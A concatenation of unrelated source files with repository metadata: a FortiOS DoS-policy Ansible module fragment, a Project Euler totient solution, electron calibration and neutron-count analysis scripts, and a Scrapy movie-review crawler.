firewall_DoS_policy6_data = data['firewall_DoS_policy6']
filtered_data = underscore_to_hyphen(filter_firewall_DoS_policy6_data(firewall_DoS_policy6_data))
if state == "present":
return fos.set('firewall',
'DoS-policy6',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'DoS-policy6',
mkey=filtered_data['policyid'],
vdom=vdom)
def is_successful_status(status):
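    # A DELETE answered with HTTP 404 is also treated as success so that
    # removing an already-absent policy stays idempotent.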
    return status['status'] == "success" or \
        (status['http_method'] == "DELETE" and status['http_status'] == 404)
def fortios_firewall(data, fos):
if data['firewall_DoS_policy6']:
resp = firewall_DoS_policy6(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_DoS_policy6": {
"required": False, "type": "dict", "default": None,
"options": {
"anomaly": {"required": False, "type": "list",
"options": {
"action": {"required": False, "type": "str",
"choices": ["pass", "block"]},
"log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"name": {"required": True, "type": "str"},
"quarantine": {"required": False, "type": "str",
"choices": ["none", "attacker"]},
"quarantine_expiry": {"required": False, "type": "str"},
"quarantine_log": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"status": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"threshold": {"required": False, "type": "int"},
"threshold(default)": {"required": False, "type": "int"}
}},
"comments": {"required": False, "type": "str"},
"dstaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"interface": {"required": False, "type": "str"},
"policyid": {"required": True, "type": "int"},
"service": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"srcaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
gpl-3.0
| 4,463,918,872,802,416,600
| 33.621277
| 157
| 0.505101
| false
| 4.785882
| false
| false
| false
|
fbcom/project-euler
|
072_counting_fractions.py
|
1
|
1188
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Counting fractions" – Project Euler Problem No. 72
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=72
def get_distinct_prime_factors(n):
ret = []
if n > 1:
for d in [2] + range(3, 1+int(n**0.5), 2):
if n % d == 0:
ret.append(d)
while n % d == 0:
n = n / d
if n <= 1:
break
if n > 1:
ret.append(n)
return ret
def phi(n):
# Euler's totient function:
# phi(n) := counts how many numbers k < n have gcd(n,k) = 1
ret = n
for p in get_distinct_prime_factors(n):
ret = ret - ret / p
return ret
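# Quick sanity checks (added for illustration, not part of the original
# solution): phi(p) = p - 1 for a prime p, and phi(9) counts {1, 2, 4, 5, 7, 8}.
assert phi(7) == 6
assert phi(9) == 6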
def count_reduced_proper_fractions(limit):
# turns out the solution is equal to the sum of phi(i) for i in [2,...,limit]
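    # (For a fixed denominator n there are exactly phi(n) numerators d < n with
    # gcd(d, n) = 1, so summing phi(n) over n = 2..limit counts every reduced
    # proper fraction exactly once.)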
ret = 0
for n in range(2, limit+1):
ret += phi(n)
return ret
# Testcase
assert count_reduced_proper_fractions(8) == 21, "Testcase failed"
# Solve
limit = 1000*1000 # one million
solution = count_reduced_proper_fractions(limit)
print "Solution:", solution
|
mit
| -8,231,899,438,116,633,000
| 23.708333
| 81
| 0.572513
| false
| 3.112861
| false
| false
| false
|
aolindahl/epicea
|
straighten_lines.py
|
1
|
4479
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 15:34:36 2015
@author: antlin
"""
import numpy as np
import matplotlib.pyplot as plt
import lmfit
import epicea
import electron_calibration_data
import plt_func
line_model = epicea.electron_calibration_helper.n_line_fit_model
line = 'voigt'
data_list = electron_calibration_data.get_data_in_list('357', True)
r_axis_mm = np.linspace(0, 25, 2**9+1)[1::2]
th_axis_rad = np.linspace(0, 2*np.pi, 2**9+1)[1::2]
th_limits = epicea.limits_from_centers(th_axis_rad)
# data = data_list[0]
for data in data_list:
r_th_img = data.get_e_rth_image(r_axis_mm, th_axis_rad)[0]
r_proj = r_th_img.sum(axis=0)
proj_params_initial = epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj, n_lines=2)
proj_result = lmfit.minimize(line_model,
proj_params_initial,
args=(r_axis_mm, r_proj),
kws={'line_type': line})
r_th_fig = plt_func.figure_wrapper('theta - r ' + data.name())
ax_origaninl = plt.subplot(221)
plt_func.imshow_wrapper(r_th_img,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
plt_func.colorbar_wrapper()
ax_origaninl.autoscale(False)
plt.subplot(223)
plt.plot(r_axis_mm, r_proj)
plt.plot(r_axis_mm, line_model(proj_result.params, r_axis_mm,
line_type=line), '--')
centers = (r_th_img * r_axis_mm).sum(axis=1) / r_th_img.sum(axis=1)
# radial_factors = centers.mean()/centers
# Find the center of the first line
low_radius_centers = np.empty_like(centers)
for i_th in range(len(th_axis_rad)):
y = r_th_img[i_th, :]
i_min = r_axis_mm.searchsorted(centers[i_th])
while y[i_min] > y[i_min - 1]:
i_min -= 1
while y[i_min] > y[i_min+1]:
i_min += 1
I_low_radius = (((centers[i_th] - 3) <= r_axis_mm) &
(r_axis_mm <= centers[i_th]))
low_radius_centers[i_th] = ((r_th_img[i_th, I_low_radius] *
r_axis_mm[I_low_radius]).sum() /
r_th_img[i_th, I_low_radius].sum())
radial_factors = low_radius_centers.mean() / low_radius_centers
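    # Each angular slice is rescaled by its radial factor so that the first
    # (low-radius) line ends up at a common radius across all theta bins.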
ax_origaninl.plot(centers, th_axis_rad, 'm')
ax_origaninl.plot(low_radius_centers, th_axis_rad, 'c')
plt_func.figure_wrapper('centers ' + data.name())
plt.subplot(121)
plt.plot(centers, th_axis_rad, label='full center')
plt.plot(low_radius_centers, th_axis_rad, label='first center')
plt.title('center position')
plt_func.legend_wrapper()
plt.subplot(122)
plt.plot(radial_factors, th_axis_rad)
plt.title('r factors')
r = data.electrons.pos_r.value
th = data.electrons.pos_t.value
for i in range(len(th_axis_rad)):
selection = (th_limits[i] < th) & (th < th_limits[i+1])
r[selection] *= radial_factors[i]
r_th_img_corrected = epicea.center_histogram_2d(r, th, r_axis_mm,
th_axis_rad)
r_proj_corrected = r_th_img_corrected.sum(axis=0)
proj_corrected_params_initial = \
epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj_corrected, n_lines=2)
proj_corrected_result = lmfit.minimize(line_model,
proj_corrected_params_initial,
args=(r_axis_mm, r_proj_corrected),
kws={'line_type': line})
ax = r_th_fig.add_subplot(222)
plt.sca(ax)
plt_func.imshow_wrapper(r_th_img_corrected,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
axis = plt.axis()
plt.plot(centers * radial_factors * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt.plot(low_radius_centers.mean() * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt_func.colorbar_wrapper()
plt.sca(r_th_fig.add_subplot(224))
plt.plot(r_axis_mm, r_proj_corrected)
plt.plot(r_axis_mm, line_model(proj_corrected_result.params, r_axis_mm,
line_type=line), '--')
plt_func.figure_wrapper('waterfall ' + data.name())
for i in range(len(th_axis_rad)):
plt.plot(r_axis_mm, r_th_img[i, :] + i * 20)
r_th_fig.tight_layout()
|
gpl-2.0
| 8,085,153,324,896,847,000
| 35.120968
| 78
| 0.553472
| false
| 3.03661
| false
| false
| false
|
siberianisaev/NeutronBarrel
|
Neutrons preprocessing/neutron_preprocessing.py
|
1
|
5365
|
import pandas as pd
import numpy as np
class ExpProcessing:
"""
class for preprocessed neutrons experiment data
"""
def __init__(self, counts_measured):
"""
Input : counts_measured - list (or any numpy convertible type)
Method creates a data frame with experimental counts, its errors,
normed values and its errors, mean and variance of the spectra
The data frame consists the next columns:
["bin", "count", "count_error", "probability", "probability_error",
"relative_error", "mean", "mean_error", "variance"]
"""
self._data = pd.DataFrame(columns=["bin", "count", "count_error", "probability",
"probability_error", "relative_error",
"mean", "mean_error", "variance"])
if not isinstance(counts_measured, np.ndarray):
try:
counts_measured = np.array(counts_measured)
except TypeError:
raise TypeError("count_measured must be an array or any numpy convertible type")
if counts_measured.size < 10:
counts_measured = np.pad(counts_measured, (0, 10 - counts_measured.size))
self._data["bin"] = [i for i in range(counts_measured.size)]
self._data["count"] = counts_measured
self._data["count_error"] = self.count_error_calculation()
self._data["relative_error"] = self._data["count_error"] / self._data["count"]
self._data["probability"], self._data["probability_error"] = self.normalization()
self._data["mean"] = self.mean_calculation()
self._data["mean_error"] = self.calculate_error_of_mean()
self._data["variance"] = self.variance_calculation()
def count_error_calculation(self):
"""
Method returns errors of experimental points s
        s = sqrt(N) / sqrt(k), for k > 1
        s = sqrt(N), for k = 0 or k = 1
where N - counts of events with multiplicity k,
k - multiplicity of event
:return: array of absolute errors
"""
counts, bins = self._data["count"], self._data["bin"]
return [(N / k) ** 0.5 if k > 1 else N ** 0.5 for N, k in zip(counts, bins)]
def normalization(self):
"""
Method converts experimental points and errors to
probability of neutron emission and its errors
:return: two arrays: array of neutron emissions probability and its errors
"""
counts = self._data["count"]
count_errors = self._data["count_error"]
total = counts.sum()
return counts / total, count_errors / total
def mean_calculation(self):
"""
Method calculates mean value of experimental spectra
mean = total_neutrons / total_events
:return: mean value
"""
bins = self._data["bin"]
counts = self._data["count"]
return bins.dot(counts).sum() / counts.sum()
def variance_calculation(self):
"""
Method calculates variance of experimental spectra
        variance = mean(data**2) - mean()**2
:return: variance
"""
bins, counts = self._data["bin"], self._data["count"]
mx2 = (bins*bins).dot(counts).sum() / counts.sum()
m = self._data["mean"][0]
return mx2 - m * m
def get_data(self):
"""
Method returns the data in pandas.DataFrame format
:return: pandas.DataFrame object
"""
return self._data
def to_csv(self, filename=""):
"""
Method saves all calculated data to .csv file
with name 'filename'
        :param filename: optional, name of file, default is 'neutrons_{current_date_and_time}.csv'
"""
if filename == "":
from datetime import datetime
now = datetime.now().strftime("%Y_%m_%d_%H_%M")
filename = f"neutrons_{now}.csv"
try:
self._data.to_csv(filename, index=False, header=True)
print(filename + " was saved successfully")
except FileNotFoundError as ex:
print("########\n# No such directory! Unsuccessful writing!\n########")
def calculate_error_of_mean(self):
"""
Method calculates the statistical error of measured mean value.
dM^2= (dN / E)^2 + (N * dE / E^2)^2
dM - mean error
N, dN - number of neutrons and its error (dN = sqrt(N))
E, dE - number of events and its error (dE = sqrt(E))
:return: dM, error of measured mean value
"""
total_events = self._data["count"].sum()
total_neutrons = self._data["count"].dot(self._data["bin"]).sum()
delta_events = total_events ** 0.5
delta_neutrons = total_neutrons ** 0.5
delta_mean_sq = (delta_neutrons / total_events)**2 + \
(total_neutrons * delta_events / total_events**2)**2
return delta_mean_sq ** 0.5
if __name__ == "__main__":
folder = "csv_05_2021/"
file = "Fm244" + ".csv"
a = [10, 20, 30]
pd.set_option('display.max_columns', None)
b = ExpProcessing(a)
print(b.get_data())
print(b.calculate_error_of_mean())
# b.to_csv(folder + file)
|
mit
| -5,235,752,218,111,256,000
| 38.954198
| 97
| 0.555266
| false
| 4.076748
| false
| false
| false
|
Rafael-Cheng/MovieReviewCrawlers
|
broad crawler/MovieReview/MovieReview/spiders/MovieReviewSpider.py
|
1
|
4028
|
# -*- encoding:utf-8 -*-
import sys
import scrapy
from MovieReview.items import MoviereviewItem
from scrapy_redis.spiders import RedisSpider
from scrapy.http import Request, HtmlResponse
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import Selector
from bs4 import BeautifulSoup
from obtain_date import obtain_date
reload(sys)
sys.setdefaultencoding('utf-8')
class MovieReviewSpider(scrapy.Spider):
name = "movie"
start_urls = ['http://maoyan.com/news?showTab=2']
# generate navigation page urls
def parse(self, response):
num_of_a = 0
leaf_divs = []
div_lenOfa = []
yield scrapy.Request(response.url, callback=self.extractLinks)
divs = response.xpath('//div')
# find leaf divs
for div in divs:
if len(div.xpath('.//div').extract()) == 0:
leaf_divs.append(div)
# calculate the number of a tags in a div
for div in leaf_divs:
div_lenOfa.append((div, len(div.xpath('.//a'))))
# sort by the number of tags
nav_divs = sorted(div_lenOfa, key=lambda tup:tup[1], reverse=True)
divs = response.xpath('./div').extract()
# locate page number tag
for div in nav_divs:
txt_in_a_tag = div[0].xpath('.//a/text()').extract()
if len(txt_in_a_tag) == 0:
continue
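            # u'下一页' is the "next page" link text on the pagination control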
if txt_in_a_tag[-1] == '下一页':
url_next_page = div[0].xpath('.//a/@href').extract()[-1]
url = response.urljoin(url_next_page)
yield scrapy.Request(url, callback=self.parse)
def extractLinks(self, response):
div_lenDiv = []
comment_urls = []
divs = response.xpath('//div')
for div in divs:
div_lenDiv.append([div, len(div.xpath('./div'))])
sorted_divs = sorted(div_lenDiv, key=lambda div_lenDiv:div_lenDiv[1], reverse=True)
urls = sorted_divs[0][0].xpath('.//a/@href').extract()
for url in urls:
complete_url = response.urljoin(url)
if complete_url not in comment_urls:
comment_urls.append(complete_url)
for url in comment_urls:
yield scrapy.Request(url=url, callback=self.parsePage)
# parse specific pages
def parsePage(self, response):
item = MoviereviewItem()
div_lenOfP = []
        try:
            title = ''.join(response.xpath('//h1/text()').extract_first().split())
        except AttributeError:
            # extract_first() returned None: the page has no <h1> title, skip it
            return
url = str(response.url).replace('http://', '').\
replace('https://', '').replace('www.', '')
source = url.split('.')[0]
divs = response.xpath('//div')
for div in divs:
div_lenOfP.append([div, len(div.xpath('./p'))])
sorted_divs = sorted(div_lenOfP, key=lambda div_lenOfP:div_lenOfP[1], reverse=True)
content_div = sorted_divs[0][0]
content = ''.join(content_div.xpath('.//p/text()').extract())
# imgs = [x for x in content_div.xpath('.//img/@src').extract()]
# hashed_images = [hash(x) for x in imgs]
item['Url'] = response.url
item['Title'] = title
item['Source'] = source
item['Time'] = obtain_date(response)
# item['Images'] = str(hashed_images)
item['Content'] = content
# item['image_urls'] = imgs
yield item
def determineMain(div, tag):
maxTag = 0
bestDiv = div
    divs = div.xpath('./div')  # keep Selector objects so the recursive calls below can use .xpath()
for _div in divs:
retDiv, noOfTag = determineMain(_div, tag)
if noOfTag > maxTag:
maxTag = noOfTag
bestDiv = retDiv
search_string = './' + tag
noOfDiv = len(div.xpath(search_string).extract())
if maxTag < noOfDiv:
maxTag = noOfDiv
bestDiv = div
    return bestDiv, maxTag
|
gpl-3.0
| 8,782,475,459,918,302,000
| 35.563636
| 91
| 0.55644
| false
| 3.724074
| false
| false
| false
|